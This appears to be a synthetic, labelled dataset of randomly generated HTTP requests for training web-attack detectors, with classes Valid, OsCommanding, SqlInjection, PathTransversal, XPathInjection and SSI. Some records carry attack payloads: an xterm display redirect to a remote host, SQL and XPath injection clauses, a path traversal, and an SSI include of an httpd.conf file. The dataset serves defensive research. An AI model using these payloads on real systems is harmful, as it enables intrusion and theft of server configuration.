Via: FTP/9.1 www.vdvmNtd.shtml, 6.6 www.r892a.shtml
Transfer-Encoding: identity
Upgrade: baheen/8.2, os6u/6.0, sloeee/4.4
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12164
Start - Id: 9293
class: Valid
GET /ihsstou3u.htm? HTTP/1.0
Host: 169.237.55.223
Connection: keep-alive
Accept: audio/x-wav;q=0.1, video/*, text/xml;q=0.0
Accept-Charset: x-mac-korean;q=0.4, utf-8;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: caapaS='n9ul5b3'
Client-ip: 201.8.180.111
Cookie: yeyehm=sndL;ump=sro:;eok;ilepl=utmV6sn2
Cookie2: $Version="09"
Date: Mon, 30 Jan 06 06:15:17 UTC
ETag: W/"u2PwNFjHljIR9rv2hs@z"
Expect: ejrw=feEent06;sLesp=hRhwpg
From: clbdsbE@ouRcuroAt.it
If-Modified-Since: Tue, 24 Feb 04 01:29:09 UTC
If-Unmodified-Since: Sun, 05 Aug 07 16:06:44 CET
If-Match: "Cd6@pA0QIea8CbTSs"
If-None-Match: *
If-Range: Tue, 27 Apr 04 05:49:12 GMT
Max-Forwards: 56
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: uwsis atswerih=iylimA
Range: -7,24425-
Referer: /mycdpiQ/m9emBx/qsh2gmia/utpS.conf
TE: trailers,trailers
Trailer: If-Match
User-Agent: adoa.X http://www.oE2mto.ch
UA-CPU: 68000
UA-Disp: 8443,1614,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6875x133
Via: FTP/7.7 224.28.165.35, HTTP/2.0 207.132.195.126
Transfer-Encoding: wgeati
Upgrade: ne3a/3.0, ktz/8.6, tsjraE/5.2, hlfe/6.2
Warning: 773 228.146.161.18 "eogoeOendth" "Tue, 23 Jan 07 17:19:26 CET"
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9293
Start - Id: 4561
class: Valid
POST /7ia8rtSh.js? HTTP/1.0
Content-Length: 56
Content-Language: RrsNno
Content-Encoding: compress
Content-Location: http://www.add6.be/atct/esdnpn/yo9amj.mdb
Content-MD5: cm9lcml3NmhoWTJsZGpybw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Apr 08 10:49:25 UTC
Last-Modified: Wed, 09 Jul 08 06:17:09 GMT
Host: www.ilmmnd2x.biz:80
Connection: close
Accept: */*
Accept-Charset: cp-950
Accept-Encoding: 
Accept-Language: 9rnHd-teoy;q=0.0, erucPT-oas3i;q=0.1
Cache-Control: only-if-cached
Client-ip: 67.31.67.160
Cookie: oxcaikartved=e9;G3elx=4eopxjtena3a;test7Qso=661832;MgtsjDclhi2s5=fiE
Cookie2: $Version="429"
Date: Sun, 26 Jul 09 08:58:24 CET
ETag: "xLyaQ.3agzdd7R3i82dq"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Sun, 18 Jan 09 20:04:21 CET
If-Unmodified-Since: Tue, 22 Nov 05 02:51:30 UTC
If-Match: "zg.tS4WdMrOK9Ik"
If-None-Match: "sh81O.O5K4oWuKX"
If-Range: Wed, 27 May 09 01:02:35 UTC
Max-Forwards: 1283
MIME-Version: 6.2
Pragma: enEajrru='Trd'
Proxy-Authorization: uaahe i2mes2rD=Tlhhrotn
Authorization: 6nhni opcl=Neatehet
Range: 5-7
Referer: /aspStecN/dtniOiil/waersapo/h8isA/neeia.pl
TE: trailers
Trailer: Host
User-Agent: Mozilla/7.1 (Machintosh; U; PPC Mac OS X 1.1; 1o-oy; rv:1.3.3) Gecko/25841975
UA-CPU: MIPS
UA-Disp: 067,349,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 308x492
Via: 4.7 124.197.141.118, FTP/1.6 www.snorn.png
Transfer-Encoding: gzip
Upgrade: y3ba/9.8
Warning: 589 28.189.6.206 "nrrp" "Sun, 11 Sep 05 11:50:25 GMT"
X-Forwarded-For: 41.244.54.15
X-Serial-Number: 8388631449289131034
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

n9=tLVvqbR6HYAp&processing-instructionMrcpmocha7amKgB=62

End - Id: 4561
Start - Id: 7538
class: Valid
POST /eF/nv-Vd55qe1PMRy.wW.-.swf? HTTP/1.0
Content-Length: 166
Content-Language: 3aoma
Content-Encoding: gzip
Content-Location: /n14ilWs/io8vao.dll
Content-MD5: bHRqZ29vZmM2cjI0aHVlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 May 04 07:24:47 GMT
Last-Modified: Sat, 31 Mar 07 23:38:43 UTC
Host: www.icsndmezo.cz:80
Connection: taeode2o
Accept: video/quicktime;q=0.9, audio/basic
Accept-Charset: iso-8859-9
Accept-Encoding: 
Accept-Language: maeeeit-tde, o-eertdsex;q=0.9, O-UhsEaj;q=0.9, taOAg-Q;q=0.0, cn-yR8u0ul
Cache-Control: no-store
Client-ip: 175.161.119.11
Cookie: VII_VkZ.vUa=1538507;slyhnaad=connectio9lhse3ci6tea;NWiso928sx2knr=htpassl883WeyTF> t;tgozTx7ssteco=578512;orenbu=xOHG;binclude2I=ee
Cookie2: $Version="208"
Date: Sun, 06 Nov 05 03:40:32 UTC
ETag: "Gkl0tmFfoOusxWAOw"
Expect: Apt3G=woubl;kwsrg=oguten
From: tedca@tnDTs3lE.org
If-Modified-Since: Wed, 30 Aug 06 22:45:43 UTC
If-Unmodified-Since: Sun, 25 Nov 07 17:19:18 UTC
If-Match: "z8NAQdiUG3e-Z@ZnTP"
If-None-Match: "3kxSgUN5GwURvvZAxa"
If-Range: *
Max-Forwards: 27
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic c2lmczpodWhyZQ==
Authorization: NTLM Y3RuN2F0cGhvZG4zYWhoam1OdmFzbjFhaXQyMnNHYWN0YXJlY3VsYWZuZA==
Range: 31105-
Referer: /inietke/meey7gcg.tar.gz
TE: trailers,trailers,chunked;q=0.6
Trailer: Via
User-Agent: Mozilla/2.4 (Windows; U; WinNT 6.1; jc-ln; rv:3.5.4) Gecko/72798594
UA-CPU: x86
UA-Disp: 8435,1661,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 607x1532
Via: 6.6 127.130.33.229, nnpve/6.9 185.224.152.189
Transfer-Encoding: deflate
Upgrade: snu/9.1, l0m/9.5, rlnstR/7.1
Warning: 213 www.eoskA.jpeg "y0tdoaExi3ntiraf0N7n" 
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 38021962558581
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ieahhsrhcce0w=rbrkc)Hat&bff7o5fx=160034&5eaiiths=47&nkyuio=0972795&eTeaesgJiou=ye6@l&e0ao2An=003143763&dUfKN6=6DlyO5.4&oZO7gooe=117-cs@NH&nosmnpd31s=connect4ird

End - Id: 7538
Start - Id: 31973
class: Valid
GET /l_W_FPm_MRHw67r59/9_C/e6e8.jpeg?39=asameg&enaolleaD=o3wBom-Fe&63@4=2aqsgw9bhR HTTP/1.0
Host: www.bicchhgn.st:49475
Connection: close
Accept: video/mpeg;q=0.8, audio/basic, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: compress, identity, identity, compress;q=0.7, deflate;q=0.1
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 151.38.107.215
Cookie: nahqrhfpa=5;cyrjris1c=ratel;nalezkst1vp9wur=tedceOOL_.;oowUwoiRlifcscu=htnk;i7aioonsamsl=isd ;Ne.A8YNR=dsxoe9weeirnddhafw
Cookie2: $Version="6"
Date: Tue, 14 Sep 04 02:09:04 GMT
ETag: W/"UziYTvo0IL8Qjfph47"
Expect: oh4tn
From: aiotemos@ar4lgiownn.be
If-Modified-Since: Sun, 07 Sep 08 13:46:14 CET
If-Unmodified-Since: Wed, 17 May 06 12:20:21 UTC
If-Match: ".ty2Nrzp6gZWjDIO-"
If-None-Match: "xHVh86jBs7ge5Pqugo4N"
If-Range: Mon, 18 Apr 05 11:02:48 UTC
Max-Forwards: 3
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: etsnds WdnRHatk=rhdNp
Authorization: NTLM MHdkeWZobG5hd2lpUEFlbnVRaTNpcGV4Y3U2dGlzT2VRNmFlb2N0dHhsMnNp
Range: -3
Referer: /iqfLi3dd/hiclstm/asewrR/evoen0r/sqacktt.cfm
TE: gzip,chunked,gzip;q=0.6
Trailer: Cache-Control
User-Agent: Mozilla/8.2 (compatible; MSIE 1.1; Windows NT; h4bw9)
UA-CPU: x86
UA-Disp: 3482,947,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3303x4060
Via: 7.5 32.245.183.116, 2.6 www.eh8idhtn.gif, 5.4 142.254.63.211
Transfer-Encoding: identity
Upgrade: ncej/3.7, hiyr3/1.0
Warning: 148 www.psN0t.tiff "Ha8aevrPaReu2aaa" 
X-Forwarded-For: 24.237.69.183
X-Serial-Number: 372913
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31973
Start - Id: 6645
class: Valid
PUT /eH8wyyLU/bF1UFY_dV/tVeh6XC/nt2imiaaAnmjtnkg.css? HTTP/1.0
Content-Length: 256
Content-Language: nuwseln
Content-Encoding: deflate
Content-Location: /Lnrlie/epje6/Nehf4ne.js
Content-MD5: enJyb2g5dmVlOXBzenRmcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Jan 06 06:39:09 CET
Last-Modified: Sun, 15 Feb 09 12:29:24 UTC
Host: 35.239.221.165:062
Connection: keep-alive
Accept: text/plain;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: Yetthroi-ysi6Wr;q=0.9, y1or-e;q=0.6
Cache-Control: min-fresh=99
Client-ip: 38.128.144.1
Cookie: eeD5rooytac=foRsmugcpTr;tc=ypotElca2jEhq3tsa;nsdtyhe=cmde a[dselectiframeaieashep;rTMtbmdio=cpninwe;eWQSFEigW=1026;eetaco=nf6wea
Cookie2: $Version="16"
Date: Sun, 04 Oct 09 02:23:48 GMT
ETag: W/"DTENKvrJSaY8wlD3aT"
Expect: 100-continue
From: bdiim@E4ea.org
If-Modified-Since: Tue, 27 May 08 07:31:06 UTC
If-Unmodified-Since: Wed, 17 Oct 07 18:18:20 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Jan 10 04:58:35 UTC
Max-Forwards: 89
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM cnp1Z3NpYXNmYlVvZWhvZWN0am5zYnZyckR0ZVpod2x0dHM=
Authorization: Digest algorithm=MD5-sess
Range: -07642,-5
Referer: http://k2reeb.net/oofytT/eCecyw.dll
TE: gzip
Trailer: Via
User-Agent: Mozilla/8.1 (X11; U; Solaris 3.3; ch-e7; rv:5.6.3) Gecko/82394684
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 792x1593
Via: 0.3 www.eqzn3I.css, 8.2 www.lq2oyhhi.jpg:9806, 2.3 www.e6oliu.js
Transfer-Encoding: gzip
Upgrade: zfoa/4.4, me8e/8.0, eH5/5.3
Warning: 107 www.Hiehri.js "eswanigari" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SlocationLgKk3nQ=0ocxfu8texeGtw6&ahxNaneremthn=ep-GB6HBsy6V&niideWrvner=aKnVphCwWQh&htal=E] m&o7eowrD=hflikekh&aoaaefcAzh2lls=on-&MitnTwlahta0alN=e'W&L3sN6l06=74ns3&fter=759429&io78mn=dadEn&Ew=iLouoaosc &fuhby7l4attiio=j m(tr6samwindow.opena\gr%u

End - Id: 6645
Start - Id: 43455
class: OsCommanding
GET /tKc6j61voctHPl5BdZ2O/uVukm/natArnntQecrtep/tYiQ9s/nermyigex8itrh/0@Qs/nno0t8aeelRRaounbtgf/aWLeT6TcDq_BZgrbOD@/9aasit/elq3lRnGXXrqtab.css?iody=3955214&4p=04372267&emusjebae=luctfnsiia&ortaytmrioeb=c++&u1Ahoio=21&ha=o%3BI%24httpA&euy=035209&eakNoihfas=%29t+2m%3Awe&en6d=%26r%3EiYexeco&VUuVy_Otmpf=3&woWpeNpH=ix1DSRa1F&styleFKPxN4_h=%250Axterm++++-display+www.ischis.com%3A0.0+++&eWlgRgpFF=inva HTTP/1.1
Host: 6.25.75.49
Connection: close
Accept: image/*, audio/basic
Accept-Charset: *
Accept-Encoding: compress;q=0.5
Accept-Language: *
Cache-Control: max-age=00
Client-ip: 106.211.70.62
Cookie: hAiTomwte=mfIilerfee;lssoiuehelewde=71;6iHBO1stz=D9aJcb5+is;SNhK2htpassW=jrhadrecqeie;CEoB@sm@FmC=ss=yo;ejpp=T3
Cookie2: $Version="71"
Date: Sat, 28 Jun 08 07:39:56 GMT
ETag: W/"KC8c4oPy9Q8-AacFtL"
Expect: 100-continue
From: unles6@edct.be
If-Modified-Since: Tue, 05 Jan 10 08:17:42 GMT
If-Unmodified-Since: Mon, 09 Jul 07 17:35:30 GMT
If-Match: "V7wcSN_i8QuCP19De"
If-None-Match: *
If-Range: Mon, 30 Apr 07 05:42:05 GMT
Max-Forwards: 49
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest nc=19e24fDE
Authorization: ryOr5p lbIrneba=8rs6eky
Range: -0418,311-
Referer: http://pgr2fyAL.uk/nsnr/e9ht.cgi
TE: chunked,deflate;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.0 (compatible; Konqueror/8.7; Win98; tdsl3pidao; rrvAb)
UA-CPU: MIPS
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 801x1629
Via: 8.5 67.0.125.165, eeeJ2/6.1 www.En8tecn.css:9653, ismo/9.7 www.EmrsnYf.gif
Transfer-Encoding: gzip
Upgrade: s2or1r/5.6, unus/0.2, iUp/7.1
Warning: 854 www.dmgmntsM.css "es0e0ne4" "Sat, 04 Oct 08 20:47:43 GMT"
X-Forwarded-For: 52.147.136.153
X-Serial-Number: 6389535154069770077
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43455
Start - Id: 41447
class: SqlInjection
POST /eqasmthea1alu5a/nE@p3BhzfOc./yv8a42ts7da/_KUodLcatkuLhwp-4/fxlIeEx0/schoao2t8iAkbnchoqe/py.A.1jmXX_c3Bo/e3anS/tSg@yxJo343zSy/rToontpEvastEyody6/ejl/8w_.js? HTTP/1.1
Content-Length: 57
Content-Language: hi,nenaisne
Content-Encoding: compress
Content-Location: http://www.sldgilu.it/npohEtga/edoe.sh
Content-MD5: c2k2NGRvaXkwd2h5ZGNlbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Oct 09 17:39:24 UTC
Last-Modified: Mon, 30 Nov 09 04:09:04 GMT
Host: 210.13.167.111
Connection: close
Accept: video/quicktime;q=0.9, image/gif
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 161.91.18.4
Cookie: rnsseeOyn=yerhsoeyeorno0oz;lpCmbtsiie=0127904
Cookie2: $Version="9"
Date: Thu, 26 Feb 04 05:36:00 GMT
ETag: "leLIR_bfgo22sOQ"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Sat, 19 Nov 05 24:53:29 CET
If-Unmodified-Since: Sun, 04 Jan 04 17:26:10 GMT
If-Match: *
If-None-Match: "a_YCkpd2EOy2bNf8ohzt"
If-Range: "dfAkBc5BPKkPXjMlYg"
Max-Forwards: 65
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Digest realm
Range: 8443-378,0047-
Referer: /emTjlm/4Ssrot/z4loa/uiioetd.cgi
TE: deflate;q=0.2
Trailer: Date
User-Agent: Mozilla/3.1 (Windows; U; Windows NT 1.1; es-ad; rv:4.4.6) Gecko/91751708
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 738x118
Via: FTP/2.7 245.246.44.104, etnnnl/3.4 62.104.67.91:17
Transfer-Encoding: gzip
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 671 145.233.120.251 "tiua3dtweorond5gt" 
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

trnIumrnrgdsitt=OR     'Snnis0' IN    (''   )

End - Id: 41447
Start - Id: 36320
class: PathTransversal
GET /rtdeEsniotnnltxm/zFl_mH0CBMj6xJ/Mtpcrrco8hettlZNna/nnie/ude6agh.bin?Tu2aagx=4094426&st=i%3A%2F.htaccess%7E&esa0a8eaztti=i3oe HTTP/1.1
Host: www.stedeacsm.com:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-greek;q=0.9, x-mac-icelandic, windows-1250;q=0.3, isiri-3342, x-mac-icelandic
Accept-Encoding: compress;q=0.2, deflate;q=0.3, identity, compress
Accept-Language: Tdrtid-thrs4xe, oc-lr8TeE;q=0.8
Cache-Control: max-age=05278
Client-ip: 204.44.253.203
Cookie: snsu3ieles4i=086;ylhna7pri=erh-yUqaxVzQ
Cookie2: $Version="628"
Date: Wed, 28 Jan 09 01:24:20 GMT
ETag: W/"XVnSSkhMGncEq258"
Expect: eyzT
From: 5ygo@eiccrasaq.org
If-Modified-Since: Fri, 13 May 05 14:06:49 CET
If-Unmodified-Since: Fri, 29 Aug 08 03:29:59 CET
If-Match: *
If-None-Match: "ItW1W2HazCEQQmgN"
If-Range: "B@RpB24hyMdcOlcD"
Max-Forwards: 522
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic aTFhdGw6bmFhc0ZIZWE=
Authorization: oeniho yjTLe=0gley
Range: -399013
Referer: /3oehra/oniets/milEs/eexsw/ruwren.php3
TE: trailers,deflate;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/0.5 (compatible; MSIE 4.5; Linux i586; eesf8e)
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 645x5981
Via: 9.0 8.139.128.236
Transfer-Encoding: compress
Upgrade: cdl/2.8, oueiab/2.3, nfnoc/8.1
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 10989646571343616
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36320
Start - Id: 49805
class: XPathInjection
GET /ihlten/ih2Ms3tkEdchtcRno/nHKip.K2vkJ-1Ps/rkMpljCzoIsMMGcTVSfu/raf0F/mmvWRLl/yu1d4@MLZGjf/eqoiGctoasuc/weenr4mptxav/sVf3qT/ejHCQ-LpTJ.swf?tlere0urEf=16&ofnSedpt=xee%27+++++or++++%28i+++++%3C++count%28lr%2Fchild%3A%3Atext%28%29%29++and++++j+%3C+count%28isl%2Fchild%3A%3Acomment%28%29%29++and+k+++%3C++++count%28Vla%2Fchild%3A%3A*%29+++++%29++or+++%27dcs2go%27++%3D%27++++Yn%27+or&Ryoaein5ifnStpr=oRd2Gf6P&samfBR1C6P.group byCv=u7o&rdsamlbuices=orioOo5ct&HtVa-mrVC7h=openp4et&QV99oXOduY@=msmail&ieseYnrmeaoe=%3Dms%40l HTTP/1.0
Host: 38.113.196.113
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7, iso-8859-4;q=0.1, us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 41.236.97.233
Cookie: diolt7loaati=dica5sueyemoie2d;Vi-4GT05_=66521;de=28;sMuw=760813281;nyasuerpzd1ahs=wiJrlVPkM;rciaaxo=80
Cookie2: $Version="71"
Date: Tue, 18 May 04 13:17:15 CET
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: ee6oai1@Beatdr.com
If-Modified-Since: Fri, 31 Aug 07 10:15:36 CET
If-Unmodified-Since: Tue, 24 Mar 09 15:19:08 CET
If-Match: *
If-None-Match: *
If-Range: "1r5@Ia9K@9zAF79wC.o"
Max-Forwards: 5
MIME-Version: 7.3
Pragma: mseQbuhi=trohsehb
Proxy-Authorization: Digest nonce
Authorization: creww rhlhoo=anoa
Range: 1-,586-,-3399
Referer: /fbhlea/os4ine.swf
TE: chunked,deflate;q=0.3
Trailer: Accept-Encoding
User-Agent: ilrd/3.3
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 172x6984
Via: 0.8 www.rohfssW6.js, 5.6 233.4.8.123
Transfer-Encoding: identity
Upgrade: oticr3/9.7
Warning: 295 41.145.9.69 "ali9sAg6ha" 
X-Forwarded-For: 134.221.245.253
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49805
Start - Id: 10554
class: Valid
GET /vfvKvar0Brk3y@copy/Etttt6rket/nh/2yXcaWeL@O2W/eTeelcqnlLree/oNr9E2JwFO2b/orttr9pegeo/y@E/hvaXAuhzQVP8b0p.js?Sstr=a3so&deqOnneP=eregvceedDtewairi&4C.Dl7Rd1=Te&ltm=tfrom&nycb8L=dlikirj HTTP/1.1
Host: 7.190.129.63
Connection: keep-alive
Accept: video/*, text/*;q=0.8, text/html;q=0.0
Accept-Charset: x-mac-chinesetrad;q=0.0, hz-gb-2312;q=0.2, iso-8859-5, isiri-3342
Accept-Encoding: *;q=0.9
Accept-Language: n2-hocygts0;q=0.3, moop4co-tealo, i-rNt;q=0.2, asuqn-otr;q=0.1, 9c5luab-3s
Cache-Control: lnhnw=ihpspor
Client-ip: 174.215.174.236
Cookie: uwzt=h-DMNTE;rNic=ipmsasee3e9;httpHacceptPsoetccC=mailfgexec
Cookie2: $Version="14"
Date: Fri, 12 May 06 15:46:35 GMT
ETag: "CmmphlPXs7s7Y7VrxWY"
Expect: ih5D4t=coayeu
From: lienea@fkubr8mmw0.cz
If-Modified-Since: Thu, 03 Jun 04 15:33:39 GMT
If-Unmodified-Since: Sat, 18 Dec 04 24:56:27 UTC
If-Match: "l1QXm3zCwUWGoFOl"
If-None-Match: *
If-Range: "dXVkpvvvzrYPY4MGQe"
Max-Forwards: 65
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Ithc Ynijwra=smrinc
Authorization: NTLM d2ViZGNiZW9peHltbHo3NHhzY3RvZ3JFRWVhYWRpZ2V5b2FzOQ==
Range: 92-,4-
Referer: http://htlgxt.de/tedrEtre/nfephh/fhkeca/zode/ehD9fe.jsp
TE: deflate,deflate;q=0.7
Trailer: Date
User-Agent: Mozilla/8.1 (Windows; U; WinNT 7.9; ex-Nm; rv:0.1.3) Gecko/32280578
UA-CPU: MIPS
UA-Disp: 7913,7267,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4657x757
Via: 6.2 56.117.168.192
Transfer-Encoding: compress
Upgrade: aianh/8.9, rdvq9p/7.9, srh/6.2
Warning: 497 64.81.137.239 "prack7" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 72395720
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10554
Start - Id: 33918
class: Valid
POST /-b5s/RhhDaacahvbee3uin/eti4ogBY/rueonjannesdmausia4.cfm? HTTP/1.1
Content-Length: 38
Content-Language: dnyst
Content-Encoding: gzip
Content-Location: http://www.Ewao.com/bo8lbF/c1sfe.css
Content-MD5: ZHJFVG93cmI4aWV0RXVlOA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Aug 05 04:24:49 GMT
Last-Modified: Thu, 07 Jun 07 23:50:55 GMT
Host: 236.124.242.121
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.1, identity;q=0.5
Accept-Language: Gi3vrEpe-oT, lhe-ewoeie;q=0.8
Cache-Control: min-fresh=4
Client-ip: 220.143.174.167
Cookie: qyfs=Spasswdeejwsa%hchildar;Twindow.openBnk=2751
Cookie2: $Version="71"
Date: Thu, 30 Mar 06 02:55:21 GMT
ETag: "k8j2P@MWQ5XdVEu0GhY"
Expect: feoerhv
From: faUspl3@yqiAa4o.it
If-Modified-Since: Mon, 23 Jun 08 14:56:14 UTC
If-Unmodified-Since: Thu, 09 Sep 04 20:24:49 GMT
If-Match: "eZoSFdG5HjtpDm9XLf"
If-None-Match: "Uqf5BzC_d8KCgYWOJHyM"
If-Range: "KEmiRFvelJkfl10"
Max-Forwards: 906
MIME-Version: 8.7
Pragma: fo1peh9='aTl3S1tn'
Proxy-Authorization: ddre3t eDfhi=ueIeutii
Authorization: Basic M2ZyNGhwNmw6ZXNjcHJsb3A=
Range: -996,858-589875
Referer: http://x0ujzt.fr/mznnk.asmx
TE: chunked;q=0.6
Trailer: Connection
User-Agent: cd8iTt (oypFsRoX; qdAI56MI; aTR9bA; rQ_RJW)
UA-CPU: Sparc
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1982x002
Via: od4Ety/8.5 www.Naotmao.css, FTP/8.0 www.pzehe.jpg, nha4oy/4.2 www.q4siadt.css:91
Transfer-Encoding: gzip
Upgrade: tiA/0.9, ntKsa/7.2, 7Aeetb/2.3, Eili/1.5, lni/0.9
Warning: 412 www.r5gne.shtml "u69WAnYcnqurieva" 
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 346952667269
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jnull_hqO=I&E5&rtr=srsXeanqo2dwdoeab

End - Id: 33918
Start - Id: 48746
class: XPathInjection
GET /etigrttrrose/sruixy@-oX1JePTHvVdH/rUO2OCP/wyskp9isbOitcathehat/5Ci/o0l/akRgt2L9s5ZmytzK/siaAtoq4oxgeMteeoTna/mj9Q7vpOrm.58.mspx?em0sdlutur68t=r+iea&ptoadara=4dcaotwn6ahqtdtte&Eleg=9179391171&LstniieajDl=entnimgmtg&Ugn7myOb6hd=sPF4&S1ii=+ll&optsli=t3ESdf&npXseos=lb&0_OX6N3home9q3=dsnj%2Fds%2Fe%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D793%5D+++or+++++%27cnAh%27+++%3D++%27&euaC2roncoarsoo=%3Fews&5C8tJ=8j.2AFA77&dpen1h=r40DEacz&d1nbp=eiQap6astylefnetcat&erxeh=hjz&srmbojra=aPR HTTP/1.1
Host: www.thbthan.uk
Connection: keep-alive
Accept: image/jpeg, text/xml, image/gif;q=0.7
Accept-Charset: iso-8859-8, iso-8859-15, shift_jis;q=0.0
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 52.241.218.21
Cookie: crrulbednu=482193;7foisn9u94lCsn=iNehe;rhsar=drac
Cookie2: $Version="80"
Date: Sun, 26 Sep 04 19:46:41 CET
ETag: W/"wDVmiBiB1QJn8Eo"
Expect: 100-continue
From: lYglyt2@7smfrhi.org
If-Modified-Since: Tue, 06 Jan 04 06:57:16 GMT
If-Unmodified-Since: Thu, 13 Mar 08 16:16:55 GMT
If-Match: "US1-Zp1h_hmGvBW0"
If-None-Match: *
If-Range: Sun, 09 Sep 07 09:32:50 CET
Max-Forwards: 94
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="dmhss"
Authorization: Digest response="3F495F6Cff6AaA2A8BF5EDecF4ef2eF0"
Range: -506333,18704-151605
Referer: http://i2wehh.org/lnodfno/esiih.html
TE: gzip,gzip;q=0.7,chunked
Trailer: Via
User-Agent: 07lVDY http://www.srItbfht.org
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: WinNT
UA-Pixels: 9907x836
Via: HTTP/4.4 www.feeoenhe.shtml, FTP/0.0 www.e6fED.jpg, 5.7 88.118.176.231
Transfer-Encoding: compress
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 110 www.nsio.html "gbuonm" "Sun, 29 Jul 07 09:27:30 CET"
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48746
Start - Id: 39770
class: SSI
GET /2mpetvuae5/tRrptk2i2l/Gdlink@Jrm-C3ASgPXQ/nfaa.jpeg?eoqtodf30=%3C%21--%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&2e9on4hbcwkgp=EejpXe25ocT&rvmtl9gnezdTa=sem HTTP/1.1
Host: www.fmieeh.org
Connection: Mrpql3wl
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wueeddt-s7h, itj6ea-o, 5-oaaadeKt;q=0.9, rtt7el-e;q=0.4
Cache-Control: no-cache
Client-ip: 139.46.215.57
Cookie: awgrrioueon2eo=579289890;MKLiDVikR=ns;memi9ae=7267738518
Cookie2: $Version="565"
Date: Tue, 18 Aug 09 10:24:05 CET
ETag: "mrd8L4bhjvMUIWAMJgI"
Expect: 100-continue
